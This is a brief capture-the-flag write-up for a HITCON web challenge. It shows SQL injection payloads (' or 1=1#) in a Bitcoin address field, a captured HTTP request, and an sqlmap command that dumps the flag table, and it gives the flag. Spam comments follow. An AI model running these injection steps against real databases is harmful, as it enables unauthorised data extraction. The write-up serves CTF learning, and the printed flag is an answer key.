Descriptions:
Are you rich? Buy the flag!Solution:
http://52.197.140.254/are_you_rich/
ps. You should NOT pay anything for this challenge
Some error messages which is non-related to challenge have been removed
1. Access to website have 2 functions, Get our bitcoin address and Verify payment.
2. Try to get our bitcoin address, It will generate some Bitcoin Address and go to verify it.
3. Not have enough money, I guess after get our bitcoin it may insert this bitcoin into database and have verify payment to check. I try to SQL Injection in Address field.
4. ' or 1=1# --- Found more than 1 records?
5. ' or 1=2# --- does not have enough confirmed money?
4. Confirm the parameter address have vulnerable to SQL Injection, I use Burp Suite to capture HTTP request and copy it to text file.
POST /are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c HTTP/1.1 Host: 52.197.140.254 Proxy-Connection: keep-alive Content-Length: 79 Cache-Control: max-age=0 Origin: http://52.197.140.254 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Referer: http://52.197.140.254/are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c Accept-Encoding: gzip, deflate Accept-Language: th,en;q=0.8 address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c&flag_id=flag1&submit=
5. Using SQLmap -r option to Load HTTP request from a text file, SQLmap verify this vulnerable is Time-Based Blind SQL Injection, and final SQLmap option that use for get a flag.
python sqlmap.py -r web50.txt -p address --threads=5 --technique=T --dbms=mysql --dbs --string="Found more than" -D areyourich -T flag1 -C flag --dump
6. Wait a several minute to retrieve a flag.
In Burp Suite (Union Based)
Flag: hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}
Good work. Spoken English Thane
ตอบลบExcellent Blog! I would like to thank for the efforts you have made in writing this post. I am hoping the same best work from you in the future as well. I wanted to thank you for this websites! Thanks for sharing. Great websites!
ตอบลบData Science Training in Bangalore
I am a new user of this site, so here I saw several articles and posts published on this site, I am more interested in some of them, hope you will provide more information on these topics in your next articles.
ตอบลบdata analytics training in bangalore
Binance, BTCTurk, Paribu sahibi kim merak ediyorsanız tıklayın: Binance, BTCTurk, Paribu Sahibi
ตอบลบBinance, BTCTurk, Paribu ne zaman kuruldu merak ediyorsanız tıklayın: Binance, BTCTurk, Paribu Ne Zaman Kuruldu
Komisyon oranları için tıklayın: BtcTurk, Binance, Paribu Güvenilir mi? Komisyon Oranları
Hangisi güvenilir merak ediyorsanız tıklayın: Btcturk, Binance, Paribu Güvenilir mi